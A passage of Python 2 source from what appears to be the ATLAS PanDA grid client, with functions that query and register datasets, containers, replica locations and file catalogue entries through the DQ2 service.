if metaItem.has_key('expirationdate') and isinstance(metaItem['expirationdate'],types.StringType):
try:
import datetime
expireDate = datetime.datetime.strptime(metaItem['expirationdate'],'%Y-%m-%d %H:%M:%S')
# expire in 7 days
if expireDate-datetime.datetime.utcnow() < datetime.timedelta(days=7):
continue
except:
pass
# all OK
metaOK = True
break
# expiring
if not metaOK:
# get files
expFilesMap['datasets'].append(dsName)
expFilesMap['files'] += queryFilesInDataset(dsName,verbose)
else:
tmpFilesList = queryFilesInDataset(dsName,verbose)
expOkFilesList += tmpFilesList
# complete
if compInDQ2:
expCompDq2FilesList += tmpFilesList
# keep to avoid redundant lookup
globalExpFilesMap[mapKey] = expFilesMap
globalExpOkFilesMap[mapKey] = expOkFilesList
globalExpCompDq2FilesMap[mapKey] = expCompDq2FilesList
if expFilesMap['datasets'] != []:
msgStr = 'ignore replicas of '
for tmpDsStr in expFilesMap['datasets']:
msgStr += '%s,' % tmpDsStr
msgStr = msgStr[:-1]
msgStr += ' at %s due to archived=ToBeDeleted or short lifetime < 7days. ' % siteID
msgStr += 'If you want to use those replicas in spite of short lifetime, use --useShortLivedReplicas'
tmpLog.info(msgStr)
# return
if getOKfiles:
return expFilesMap,expOkFilesList,expCompDq2FilesList
return expFilesMap
# get replica metadata
def getReplicaMetadata(name,dq2Locations,verbose):
# get logger
tmpLog = PLogger.getPandaLogger()
if verbose:
tmpLog.debug("getReplicaMetadata for %s" % (name))
# instantiate curl
curl = _Curl()
curl.verbose = verbose
try:
errStr = ''
# get VUID
url = baseURLDQ2 + '/ws_repository/rpc'
data = {'operation':'queryDatasetByName','dsn':name,'version':0,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.get(url,data,rucioAccount=True)
if status != 0:
errStr = "ERROR : could not access DQ2 server"
sys.exit(EC_Failed)
# parse
datasets = {}
if out == '\x00' or not checkDatasetInMap(name,out):
errStr = "ERROR : VUID for %s was not found in DQ2" % name
sys.exit(EC_Failed)
# get VUIDs
vuid = out[name]['vuids'][0]
# get replica metadata
retList = []
for location in dq2Locations:
url = baseURLDQ2 + '/ws_location/rpc'
data = {'operation':'queryDatasetReplicaMetadata','vuid':vuid,
'location':location,'API':'0_3_0',
'tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.post(url,data,rucioAccount=True)
if status != 0:
errStr = "ERROR : could not access DQ2 server to get replica metadata"
sys.exit(EC_Failed)
# append
retList.append(out)
# return
return retList
except:
print status,out
if errStr != '':
print errStr
else:
print "ERROR : invalid DQ2 response"
sys.exit(EC_Failed)
# query files in shadow datasets associated to container
def getFilesInShadowDataset(contName,suffixShadow,verbose=False):
fileList = []
# query files in PandaDB first to get running/failed files + files which are being added
tmpList = getFilesInUseForAnal(contName,verbose)
for tmpItem in tmpList:
if not tmpItem in fileList:
# append
fileList.append(tmpItem)
# get elements in container
elements = getElementsFromContainer(contName,verbose)
for tmpEle in elements:
# remove merge
tmpEle = re.sub('\.merge$','',tmpEle)
shadowDsName = "%s%s" % (tmpEle,suffixShadow)
# check existence
tmpDatasets = getDatasets(shadowDsName,verbose)
if len(tmpDatasets) == 0:
continue
# get files in shadow dataset
tmpList = queryFilesInDataset(shadowDsName,verbose)
for tmpItem in tmpList:
if not tmpItem in fileList:
# append
fileList.append(tmpItem)
return fileList
# query files in shadow dataset associated to old dataset
def getFilesInShadowDatasetOld(outDS,suffixShadow,verbose=False):
shadowList = []
# query files in PandaDB first to get running/failed files + files which are being added
tmpShadowList = getFilesInUseForAnal(outDS,verbose)
for tmpItem in tmpShadowList:
shadowList.append(tmpItem)
# query files in shadow dataset
for tmpItem in queryFilesInDataset("%s%s" % (outDS,suffixShadow),verbose):
if not tmpItem in shadowList:
shadowList.append(tmpItem)
return shadowList
# list datasets by GUIDs
def listDatasetsByGUIDs(guids,dsFilter,verbose=False,forColl=False):
# instantiate curl
curl = _Curl()
curl.verbose = verbose
# get filter
dsFilters = []
if dsFilter != '':
dsFilters = dsFilter.split(',')
# get logger
tmpLog = PLogger.getPandaLogger()
retMap = {}
allMap = {}
iLookUp = 0
guidLfnMap = {}
checkedDSList = []
# loop over all GUIDs
for guid in guids:
# check existing map to avid redundant lookup
if guidLfnMap.has_key(guid):
retMap[guid] = guidLfnMap[guid]
continue
iLookUp += 1
if iLookUp % 20 == 0:
time.sleep(1)
# get vuids
url = baseURLDQ2 + '/ws_content/rpc'
data = {'operation': 'queryDatasetsWithFileByGUID','guid':guid,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.get(url,data,rucioAccount=True)
# failed
if status != 0:
if not verbose:
print status,out
errStr = "could not get dataset vuids for %s" % guid
tmpLog.error(errStr)
sys.exit(EC_Failed)
# GUID was not registered in DQ2
if out == '\x00' or out == ():
if verbose:
errStr = "DQ2 gave an empty list for GUID=%s" % guid
tmpLog.debug(errStr)
allMap[guid] = []
continue
tmpVUIDs = list(out)
# get dataset name
url = baseURLDQ2 + '/ws_repository/rpc'
data = {'operation':'queryDatasetByVUIDs','vuids':tmpVUIDs,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.post(url,data,rucioAccount=True)
# failed
if status != 0:
if not verbose:
print status,out
errStr = "could not get dataset name for %s" % guid
tmpLog.error(errStr)
sys.exit(EC_Failed)
# empty
if out == '\x00':
errStr = "DQ2 gave an empty list for VUID=%s" % tmpVUIDs
tmpLog.error(errStr)
sys.exit(EC_Failed)
# datasets are deleted
if out == {}:
allMap[guid] = []
continue
# check with filter
tmpDsNames = []
tmpAllDsNames = []
for tmpDsName in out.keys():
# ignore junk datasets
if tmpDsName.startswith('panda') or \
tmpDsName.startswith('user') or \
tmpDsName.startswith('group') or \
re.search('_sub\d+$',tmpDsName) != None or \
re.search('_dis\d+$',tmpDsName) != None or \
re.search('_shadow$',tmpDsName) != None:
continue
tmpAllDsNames.append(tmpDsName)
# check with filter
if dsFilters != []:
flagMatch = False
for tmpFilter in dsFilters:
# replace . to \.
tmpFilter = tmpFilter.replace('.','\.')
# replace * to .*
tmpFilter = tmpFilter.replace('*','.*')
if re.search('^'+tmpFilter,tmpDsName) != None:
flagMatch = True
break
# not match
if not flagMatch:
continue
# append
tmpDsNames.append(tmpDsName)
# empty
if tmpDsNames == []:
# there may be multiple GUIDs for the same event, and some may be filtered by --eventPickDS
allMap[guid] = tmpAllDsNames
continue
# duplicated
if len(tmpDsNames) != 1:
if not forColl:
errStr = "there are multiple datasets %s for GUID:%s. Please set --eventPickDS and/or --eventPickStreamName to choose one dataset"\
% (str(tmpAllDsNames),guid)
else:
errStr = "there are multiple datasets %s for GUID:%s. Please set --eventPickDS to choose one dataset"\
% (str(tmpAllDsNames),guid)
tmpLog.error(errStr)
sys.exit(EC_Failed)
# get LFN
if not tmpDsNames[0] in checkedDSList:
tmpMap = queryFilesInDataset(tmpDsNames[0],verbose)
for tmpLFN,tmpVal in tmpMap.iteritems():
guidLfnMap[tmpVal['guid']] = (tmpDsNames[0],tmpLFN)
checkedDSList.append(tmpDsNames[0])
# append
if not guidLfnMap.has_key(guid):
errStr = "LFN for %s in not found in %s" % (guid,tmpDsNames[0])
tmpLog.error(errStr)
sys.exit(EC_Failed)
retMap[guid] = guidLfnMap[guid]
# return
return retMap,allMap
# register dataset
def addDataset(name,verbose=False,location='',dsExist=False,allowProdDisk=False,dsCheck=True):
# generate DUID/VUID
duid = MiscUtils.wrappedUuidGen()
vuid = MiscUtils.wrappedUuidGen()
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
try:
errStr = ''
# add
if not dsExist:
url = baseURLDQ2SSL + '/ws_repository/rpc'
nTry = 3
for iTry in range(nTry):
data = {'operation':'addDataset','dsn': name,'duid': duid,'vuid':vuid,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen(),'update':'yes'}
status,out = curl.post(url,data,rucioAccount=True)
if not dsCheck and out != None and re.search('DQDatasetExistsException',out) != None:
dsExist = True
break
elif status != 0 or (out != None and re.search('Exception',out) != None):
if iTry+1 == nTry:
errStr = "ERROR : could not add dataset to DQ2 repository"
sys.exit(EC_Failed)
time.sleep(20)
else:
break
# get VUID
if dsExist:
# check location
tmpLocations = getLocations(name,[],'',False,verbose,getDQ2IDs=True)
if location in tmpLocations:
return
# get VUID
url = baseURLDQ2 + '/ws_repository/rpc'
data = {'operation':'queryDatasetByName','dsn':name,'version':0,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.get(url,data,rucioAccount=True)
if status != 0:
errStr = "ERROR : could not get VUID from DQ2"
sys.exit(EC_Failed)
# parse
vuid = out[name]['vuids'][0]
# add replica
if re.search('SCRATCHDISK$',location) != None or re.search('USERDISK$',location) != None \
or re.search('LOCALGROUPDISK$',location) != None \
or (allowProdDisk and (re.search('PRODDISK$',location) != None or \
re.search('DATADISK$',location) != None)):
url = baseURLDQ2SSL + '/ws_location/rpc'
nTry = 3
for iTry in range(nTry):
data = {'operation':'addDatasetReplica','vuid':vuid,'site':location,
'complete':0,'transferState':1,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.post(url,data,rucioAccount=True)
if status != 0 or out != 1:
if iTry+1 == nTry:
errStr = "ERROR : could not register location : %s" % location
sys.exit(EC_Failed)
time.sleep(20)
else:
break
else:
errStr = "ERROR : registration at %s is disallowed" % location
sys.exit(EC_Failed)
except:
print status,out
if errStr != '':
print errStr
else:
print "ERROR : invalid DQ2 response"
sys.exit(EC_Failed)
# create dataset container
def createContainer(name,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
try:
errStr = ''
# add
url = baseURLDQ2SSL + '/ws_dq2/rpc'
nTry = 3
for iTry in range(nTry):
data = {'operation':'container_create','name': name,
'API':'030','tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.post(url,data,rucioAccount=True)
if status != 0 or (out != None and re.search('Exception',out) != None):
if iTry+1 == nTry:
errStr = "ERROR : could not create container in DQ2"
sys.exit(EC_Failed)
time.sleep(20)
else:
break
except:
print status,out
if errStr != '':
print errStr
else:
print "ERROR : invalid DQ2 response"
sys.exit(EC_Failed)
# add datasets to container
def addDatasetsToContainer(name,datasets,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
try:
errStr = ''
# add
url = baseURLDQ2SSL + '/ws_dq2/rpc'
nTry = 3
for iTry in range(nTry):
data = {'operation':'container_register','name': name,
'datasets':datasets,'API':'030',
'tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.post(url,data,rucioAccount=True)
if status != 0 or (out != None and re.search('Exception',out) != None):
if iTry+1 == nTry:
errStr = "ERROR : could not add DQ2 datasets to container"
sys.exit(EC_Failed)
time.sleep(20)
else:
break
except:
print status,out
if errStr != '':
print errStr
else:
print "ERROR : invalid DQ2 response"
sys.exit(EC_Failed)
# get container elements
def getElementsFromContainer(name,verbose=False):
# instantiate curl
curl = _Curl()
curl.verbose = verbose
try:
errStr = ''
# get elements
url = baseURLDQ2 + '/ws_dq2/rpc'
data = {'operation':'container_retrieve','name': name,
'API':'030','tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.get(url,data,rucioAccount=True)
if status != 0 or (isinstance(out,types.StringType) and re.search('Exception',out) != None):
errStr = "ERROR : could not get container %s from DQ2" % name
sys.exit(EC_Failed)
return out
except:
print status,out
type, value, traceBack = sys.exc_info()
print "%s %s" % (type,value)
if errStr != '':
print errStr
else:
print "ERROR : invalid DQ2 response"
sys.exit(EC_Failed)
# convert srmv2 site to srmv1 site ID
def convSrmV2ID(tmpSite):
# keep original name to avoid double conversion
origSite = tmpSite
# doesn't convert FR/IT/UK sites
for tmpPrefix in ['IN2P3-','INFN-','UKI-','GRIF-','DESY-','UNI-','RU-',
'LIP-','RO-']:
if tmpSite.startswith(tmpPrefix):
tmpSite = re.sub('_[A-Z,0-9]+DISK$', 'DISK',tmpSite)
tmpSite = re.sub('_[A-Z,0-9]+TAPE$', 'DISK',tmpSite)
tmpSite = re.sub('_PHYS-[A-Z,0-9]+$','DISK',tmpSite)
tmpSite = re.sub('_PERF-[A-Z,0-9]+$','DISK',tmpSite)
tmpSite = re.sub('_DET-[A-Z,0-9]+$', 'DISK',tmpSite)
tmpSite = re.sub('_SOFT-[A-Z,0-9]+$','DISK',tmpSite)
tmpSite = re.sub('_TRIG-DAQ$','DISK',tmpSite)
return tmpSite
# parch for CERN EOS
if tmpSite.startswith('CERN-PROD_EOS'):
return 'CERN-PROD_EOSDISK'
# parch for CERN TMP
if tmpSite.startswith('CERN-PROD_TMP'):
return 'CERN-PROD_TMPDISK'
# parch for CERN OLD
if tmpSite.startswith('CERN-PROD_OLD') or tmpSite.startswith('CERN-PROD_LOCAL'):
return 'CERN-PROD_OLDDISK'
# patch for SRM v2
tmpSite = re.sub('-[^-_]+_[A-Z,0-9]+DISK$', 'DISK',tmpSite)
tmpSite = re.sub('-[^-_]+_[A-Z,0-9]+TAPE$', 'DISK',tmpSite)
tmpSite = re.sub('-[^-_]+_PHYS-[A-Z,0-9]+$','DISK',tmpSite)
tmpSite = re.sub('-[^-_]+_PERF-[A-Z,0-9]+$','DISK',tmpSite)
tmpSite = re.sub('-[^-_]+_DET-[A-Z,0-9]+$', 'DISK',tmpSite)
tmpSite = re.sub('-[^-_]+_SOFT-[A-Z,0-9]+$','DISK',tmpSite)
tmpSite = re.sub('-[^-_]+_TRIG-DAQ$','DISK',tmpSite)
# SHOULD BE REMOVED Once all sites and DQ2 migrate to srmv2
# patch for BNL
if tmpSite in ['BNLDISK','BNLTAPE']:
tmpSite = 'BNLPANDA'
# patch for LYON
if tmpSite in ['LYONDISK','LYONTAPE']:
tmpSite = 'IN2P3-CCDISK'
# patch for TAIWAN
if tmpSite.startswith('ASGC'):
tmpSite = 'TAIWANDISK'
# patch for CERN
if tmpSite.startswith('CERN'):
tmpSite = 'CERNDISK'
# patche for some special sites where automatic conjecture is impossible
if tmpSite == 'UVIC':
tmpSite = 'VICTORIA'
# US T2s
if origSite == tmpSite:
tmpSite = re.sub('_[A-Z,0-9]+DISK$', '',tmpSite)
tmpSite = re.sub('_[A-Z,0-9]+TAPE$', '',tmpSite)
tmpSite = re.sub('_PHYS-[A-Z,0-9]+$','',tmpSite)
tmpSite = re.sub('_PERF-[A-Z,0-9]+$','',tmpSite)
tmpSite = re.sub('_DET-[A-Z,0-9]+$', '',tmpSite)
tmpSite = re.sub('_SOFT-[A-Z,0-9]+$','',tmpSite)
tmpSite = re.sub('_TRIG-DAQ$','',tmpSite)
if tmpSite == 'NET2':
tmpSite = 'BU'
if tmpSite == 'MWT2_UC':
tmpSite = 'MWT2'
# return
return tmpSite
# check tape sites
def isTapeSite(origTmpSite):
if re.search('TAPE$',origTmpSite) != None or \
re.search('PROD_TZERO$',origTmpSite) != None or \
re.search('PROD_TMPDISK$',origTmpSite) != None or \
re.search('PROD_DAQ$',origTmpSite) != None:
return True
return False
# check online site
def isOnlineSite(origTmpSite):
# get PandaID
tmpPandaSite = convertDQ2toPandaID(origTmpSite)
# check if Panda site
if not PandaSites.has_key(tmpPandaSite):
return False
# exclude long,local queues
if isExcudedSite(tmpPandaSite):
return False
# status
if PandaSites[tmpPandaSite]['status'] == 'online':
return True
return False
# get locations
def getLocations(name,fileList,cloud,woFileCheck,verbose=False,expCloud=False,getReserved=False,
getTapeSites=False,getDQ2IDs=False,locCandidates=None,removeDS=False,
removedDatasets=[],useOutContainer=False,includeIncomplete=False,
notSiteStatusCheck=False,useCVMFS=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# get logger
tmpLog = PLogger.getPandaLogger()
try:
errStr = ''
names = name.split(',')
# loop over all names
retSites = []
retSiteMap = {}
resRetSiteMap = {}
resBadStSites = {}
resTapeSites = {}
retDQ2IDs = []
retDQ2IDmap = {}
allOut = {}
iLookUp = 0
resUsedDsMap = {}
global globalCompleteDsMap
# convert candidates for SRM v2
if locCandidates != None:
locCandidatesSrmV2 = []
for locTmp in locCandidates:
locCandidatesSrmV2.append(convSrmV2ID(locTmp))
# loop over all names
for tmpName in names:
# ignore removed datasets
if tmpName in removedDatasets:
continue
iLookUp += 1
if iLookUp % 20 == 0:
time.sleep(1)
# container
containerFlag = False
if tmpName.endswith('/'):
containerFlag = True
# get VUID
url = baseURLDQ2 + '/ws_repository/rpc'
data = {'operation':'queryDatasetByName','dsn':tmpName,'version':0,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.get(url,data,rucioAccount=True)
if status != 0 or out == '\x00' or (not checkDatasetInMap(tmpName,out)):
errStr = "ERROR : could not find %s in DQ2 DB. Check if the dataset name is correct" \
% tmpName
if getReserved and getTapeSites:
sys.exit(EC_Failed)
if verbose:
print errStr
return retSites
# get real datasetname
tmpName = getDatasetValueInMap(tmpName,out)
# parse
duid = out[tmpName]['duid']
# get replica location
url = baseURLDQ2 + '/ws_location/rpc'
if containerFlag:
data = {'operation':'listContainerReplicas','cn':tmpName,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen()}
else:
data = {'operation':'listDatasetReplicas','duid':duid,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.post(url,data,rucioAccount=True)
if status != 0:
errStr = "ERROR : could not query location for %s" % tmpName
sys.exit(EC_Failed)
# convert container format to dataset's one
outTmp = {}
if containerFlag:
# count number of complete elements
for tmpEleName,tmpEleVal in out.iteritems():
# ignore removed datasets
if tmpEleName in removedDatasets:
continue
for tmpEleVUID,tmpEleLocs in tmpEleVal.iteritems():
# get complete locations
tmpFoundFlag = False
for tmpEleLoc in tmpEleLocs[1]:
# don't use TAPE
if isTapeSite(tmpEleLoc):
if not resTapeSites.has_key(tmpEleLoc):
resTapeSites[tmpEleLoc] = []
if not tmpEleName in resTapeSites[tmpEleLoc]:
resTapeSites[tmpEleLoc].append(tmpEleName)
continue
# append
if not outTmp.has_key(tmpEleLoc):
outTmp[tmpEleLoc] = [{'found':0,'useddatasets':[]}]
# increment
outTmp[tmpEleLoc][0]['found'] += 1
# append list
if not tmpEleName in outTmp[tmpEleLoc][0]['useddatasets']:
outTmp[tmpEleLoc][0]['useddatasets'].append(tmpEleName)
# found online site
if isOnlineSite(tmpEleLoc):
tmpFoundFlag = True
# add to global map
if not globalCompleteDsMap.has_key(tmpEleName):
globalCompleteDsMap[tmpEleName] = []
globalCompleteDsMap[tmpEleName].append(tmpEleLoc)
# use incomplete locations if no complete replica at online sites
if includeIncomplete or not tmpFoundFlag:
for tmpEleLoc in tmpEleLocs[0]:
# don't use TAPE
if isTapeSite(tmpEleLoc):
if not resTapeSites.has_key(tmpEleLoc):
resTapeSites[tmpEleLoc] = []
if not tmpEleName in resTapeSites[tmpEleLoc]:
resTapeSites[tmpEleLoc].append(tmpEleName)
continue
# append
if not outTmp.has_key(tmpEleLoc):
outTmp[tmpEleLoc] = [{'found':0,'useddatasets':[]}]
# increment
outTmp[tmpEleLoc][0]['found'] += 1
# append list
if not tmpEleName in outTmp[tmpEleLoc][0]['useddatasets']:
outTmp[tmpEleLoc][0]['useddatasets'].append(tmpEleName)
else:
# check completeness
tmpIncompList = []
tmpFoundFlag = False
for tmpOutKey,tmpOutVar in out.iteritems():
# don't use TAPE
if isTapeSite(tmpOutKey):
if not resTapeSites.has_key(tmpOutKey):
resTapeSites[tmpOutKey] = []
if not tmpName in resTapeSites[tmpOutKey]:
resTapeSites[tmpOutKey].append(tmpName)
continue
# protection against unchecked
tmpNfound = tmpOutVar[0]['found']
# complete or not
if isinstance(tmpNfound,types.IntType) and tmpNfound == tmpOutVar[0]['total']:
outTmp[tmpOutKey] = [{'found':1,'useddatasets':[tmpName]}]
# found online site
if isOnlineSite(tmpOutKey):
tmpFoundFlag = True
# add to global map
if not globalCompleteDsMap.has_key(tmpName):
globalCompleteDsMap[tmpName] = []
globalCompleteDsMap[tmpName].append(tmpOutKey)
else:
# keep just in case
if not tmpOutKey in tmpIncompList:
tmpIncompList.append(tmpOutKey)
# use incomplete replicas when no complete at online sites
if includeIncomplete or not tmpFoundFlag:
for tmpOutKey in tmpIncompList:
outTmp[tmpOutKey] = [{'found':1,'useddatasets':[tmpName]}]
# replace
out = outTmp
# sum
for tmpOutKey,tmpOutVar in out.iteritems():
if not allOut.has_key(tmpOutKey):
allOut[tmpOutKey] = [{'found':0,'useddatasets':[]}]
allOut[tmpOutKey][0]['found'] += tmpOutVar[0]['found']
allOut[tmpOutKey][0]['useddatasets'] += tmpOutVar[0]['useddatasets']
# replace
out = allOut
if verbose:
print out
# choose sites where most files are available
if not woFileCheck:
tmpMaxFiles = -1
for origTmpSite,origTmpInfo in out.iteritems():
# get PandaID
tmpPandaSite = convertDQ2toPandaID(origTmpSite)
# check status
if PandaSites.has_key(tmpPandaSite) and (notSiteStatusCheck or PandaSites[tmpPandaSite]['status'] == 'online'):
# don't use TAPE
if isTapeSite(origTmpSite):
if not resTapeSites.has_key(origTmpSite):
if origTmpInfo[0].has_key('useddatasets'):
resTapeSites[origTmpSite] = origTmpInfo[0]['useddatasets']
else:
resTapeSites[origTmpSite] = names
continue
# check the number of available files
if tmpMaxFiles < origTmpInfo[0]['found']:
tmpMaxFiles = origTmpInfo[0]['found']
# remove sites
for origTmpSite in out.keys():
if out[origTmpSite][0]['found'] < tmpMaxFiles:
# use sites where most files are avaialble if output container is not used
if not useOutContainer:
del out[origTmpSite]
if verbose:
print out
tmpFirstDump = True
for origTmpSite,origTmpInfo in out.iteritems():
# don't use TAPE
if isTapeSite(origTmpSite):
if not resTapeSites.has_key(origTmpSite):
resTapeSites[origTmpSite] = origTmpInfo[0]['useddatasets']
continue
# collect DQ2 IDs
if not origTmpSite in retDQ2IDs:
retDQ2IDs.append(origTmpSite)
for tmpUDS in origTmpInfo[0]['useddatasets']:
if not retDQ2IDmap.has_key(tmpUDS):
retDQ2IDmap[tmpUDS] = []
if not origTmpSite in retDQ2IDmap[tmpUDS]:
retDQ2IDmap[tmpUDS].append(origTmpSite)
# patch for SRM v2
tmpSite = convSrmV2ID(origTmpSite)
# if candidates are limited
if locCandidates != None and (not tmpSite in locCandidatesSrmV2):
continue
if verbose:
tmpLog.debug('%s : %s->%s' % (tmpName,origTmpSite,tmpSite))
# check cloud, DQ2 ID and status
tmpSiteBeforeLoop = tmpSite
for tmpID,tmpSpec in PandaSites.iteritems():
# reset
tmpSite = tmpSiteBeforeLoop
# get list of DQ2 IDs
srmv2ddmList = []
for tmpDdmID in tmpSpec['setokens'].values():
srmv2ddmList.append(convSrmV2ID(tmpDdmID))
# dump
if tmpFirstDump:
if verbose:
pass
if tmpSite in srmv2ddmList or convSrmV2ID(tmpSpec['ddm']).startswith(tmpSite) \
or (useCVMFS and tmpSpec['iscvmfs'] == True):
# overwrite tmpSite for srmv1
tmpSite = convSrmV2ID(tmpSpec['ddm'])
# exclude long,xrootd,local queues
if isExcudedSite(tmpID):
continue
if not tmpSite in retSites:
retSites.append(tmpSite)
# just collect locations when file check is disabled
if woFileCheck:
break
# append site
if tmpSpec['status'] == 'online' or notSiteStatusCheck:
# return sites in a cloud when it is specified or all sites
if tmpSpec['cloud'] == cloud or (not expCloud):
appendMap = retSiteMap
else:
appendMap = resRetSiteMap
# mapping between location and Panda siteID
if not appendMap.has_key(tmpSite):
appendMap[tmpSite] = []
if not tmpID in appendMap[tmpSite]:
appendMap[tmpSite].append(tmpID)
if origTmpInfo[0].has_key('useddatasets'):
if not tmpID in resUsedDsMap:
resUsedDsMap[tmpID] = []
resUsedDsMap[tmpID] += origTmpInfo[0]['useddatasets']
else:
# not interested in another cloud
if tmpSpec['cloud'] != cloud and expCloud:
continue
# keep bad status sites for info
if not resBadStSites.has_key(tmpSpec['status']):
resBadStSites[tmpSpec['status']] = []
if not tmpID in resBadStSites[tmpSpec['status']]:
resBadStSites[tmpSpec['status']].append(tmpID)
tmpFirstDump = False
# retrun DQ2 IDs
if getDQ2IDs:
if includeIncomplete:
return retDQ2IDmap,resUsedDsMap
return retDQ2IDs
# return list when file check is not required
if woFileCheck:
return retSites
# use reserved map when the cloud doesn't hold the dataset
if retSiteMap == {} and (not expCloud) and (not getReserved):
retSiteMap = resRetSiteMap
# reset reserved map for expCloud
if getReserved and expCloud:
resRetSiteMap = {}
# return map
if verbose:
if not getReserved:
tmpLog.debug("getLocations -> %s" % retSiteMap)
else:
tmpLog.debug("getLocations pri -> %s" % retSiteMap)
tmpLog.debug("getLocations sec -> %s" % resRetSiteMap)
# print bad status sites for info
if retSiteMap == {} and resRetSiteMap == {} and resBadStSites != {}:
msgFirstFlag = True
for tmpStatus,tmpSites in resBadStSites.iteritems():
# ignore panda secific site
if tmpStatus.startswith('panda_'):
continue
if msgFirstFlag:
tmpLog.warning("the following sites hold %s but they are not online" % name)
msgFirstFlag = False
print " status=%s : %s" % (tmpStatus,tmpSites)
if not getReserved:
return retSiteMap
elif not getTapeSites:
return retSiteMap,resRetSiteMap
elif not removeDS:
return retSiteMap,resRetSiteMap,resTapeSites
else:
return retSiteMap,resRetSiteMap,resTapeSites,resUsedDsMap
except:
print status,out
if errStr != '':
print errStr
else:
type, value, traceBack = sys.exc_info()
print "ERROR : invalid DQ2 response - %s %s" % (type,value)
sys.exit(EC_Failed)
#@ Returns number of events per file in a given dataset
#SP 2006
#
def nEvents(name, verbose=False, askServer=True, fileList = {}, scanDir = '.', askUser=True):
# @ These declarations can be moved to the configuration section at the very beginning
# Here just for code clarity
#
# Parts of the query
str1="/?dset="
str2="&get=evperfile"
# Form full query string
m_query = baseURLMON+str1+name+str2
manualEnter = True
# Send query get number of events per file
if askServer:
nEvents=urllib.urlopen(m_query).read()
if verbose:
print m_query
print nEvents
if re.search('HTML',nEvents) == None and nEvents != '-1':
manualEnter = False
else:
# use ROOT to get # of events
try:
import ROOT
rootFile = ROOT.TFile("%s/%s" % (scanDir,fileList[0]))
tree = ROOT.gDirectory.Get( 'CollectionTree' )
nEvents = tree.GetEntriesFast()
# disable
if nEvents > 0:
manualEnter = False
except:
if verbose:
type, value, traceBack = sys.exc_info()
print "ERROR : could not get nEvents with ROOT - %s %s" % (type,value)
# In case of error PANDAMON server returns full HTML page
# Normally return an integer
if manualEnter:
if askUser:
if askServer:
print "Could not get the # of events from MetaDB for %s " % name
while True:
str = raw_input("Enter the number of events per file (or set --nEventsPerFile) : ")
try:
nEvents = int(str)
break
except:
pass
else:
print "ERROR : Could not get the # of events from MetaDB for %s " % name
sys.exit(EC_Failed)
if verbose:
print "Dataset %s has %s evetns per file" % (name,nEvents)
return int(nEvents)
# get PFN from LRC
def _getPFNsLRC(lfns,dq2url,verbose):
pfnMap = {}
# instantiate curl
curl = _Curl()
curl.verbose = verbose
# get PoolFileCatalog
iLFN = 0
strLFNs = ''
url = dq2url + 'lrc/PoolFileCatalog'
firstError = True
# check if GUID lookup is supported
useGUID = True
status,out = curl.get(url,{'guids':'test'})
if status ==0 and out == 'Must GET or POST a list of LFNs!':
useGUID = False
for lfn,vals in lfns.iteritems():
iLFN += 1
# make argument
if useGUID:
strLFNs += '%s ' % vals['guid']
else:
strLFNs += '%s ' % lfn
if iLFN % 40 == 0 or iLFN == len(lfns):
# get PoolFileCatalog
strLFNs = strLFNs.rstrip()
if useGUID:
data = {'guids':strLFNs}
else:
data = {'lfns':strLFNs}
# avoid too long argument
strLFNs = ''
# execute
status,out = curl.get(url,data)
time.sleep(2)
if out.startswith('Error'):
# LFN not found
continue
if status != 0 or (not out.startswith('<?xml')):
if firstError:
print status,out
print "ERROR : LRC %s returned invalid response" % dq2url
firstError = False
continue
# parse
try:
root = xml.dom.minidom.parseString(out)
files = root.getElementsByTagName('File')
for file in files:
# get PFN and LFN nodes
physical = file.getElementsByTagName('physical')[0]
pfnNode = physical.getElementsByTagName('pfn')[0]
logical = file.getElementsByTagName('logical')[0]
lfnNode = logical.getElementsByTagName('lfn')[0]
# convert UTF8 to Raw
pfn = str(pfnNode.getAttribute('name'))
lfn = str(lfnNode.getAttribute('name'))
# remove /srm/managerv1?SFN=
pfn = re.sub('/srm/managerv1\?SFN=','',pfn)
# append
pfnMap[lfn] = pfn
except:
print status,out
type, value, traceBack = sys.exc_info()
print "ERROR : could not parse XML - %s %s" % (type, value)
sys.exit(EC_Failed)
# return
return pfnMap
# get list of missing LFNs from LRC
def getMissLFNsFromLRC(files,url,verbose=False,nFiles=0):
# get PFNs
pfnMap = _getPFNsLRC(files,url,verbose)
# check Files
missFiles = []
for file in files:
if not file in pfnMap.keys():
missFiles.append(file)
return missFiles
# get PFN list from LFC
def _getPFNsLFC(fileMap,site,explicitSE,verbose=False,nFiles=0):
pfnMap = {}
for path in sys.path:
# look for base package
basePackage = __name__.split('.')[-2]
if os.path.exists(path) and os.path.isdir(path) and basePackage in os.listdir(path):
lfcClient = '%s/%s/LFCclient.py' % (path,basePackage)
if explicitSE:
stList = getSE(site)
else:
stList = []
lfcHost = getLFC(site)
inFile = '%s_in' % MiscUtils.wrappedUuidGen()
outFile = '%s_out' % MiscUtils.wrappedUuidGen()
# write GUID/LFN
ifile = open(inFile,'w')
fileKeys = fileMap.keys()
fileKeys.sort()
for lfn in fileKeys:
vals = fileMap[lfn]
ifile.write('%s %s\n' % (vals['guid'],lfn))
ifile.close()
# construct command
gridSrc = _getGridSrc()
com = '%s python -Wignore %s -l %s -i %s -o %s -n %s' % (gridSrc,lfcClient,lfcHost,inFile,outFile,nFiles)
for index,stItem in enumerate(stList):
if index != 0:
com += ',%s' % stItem
else:
com += ' -s %s' % stItem
if verbose:
com += ' -v'
print com
# exeute
status = os.system(com)
if status == 0:
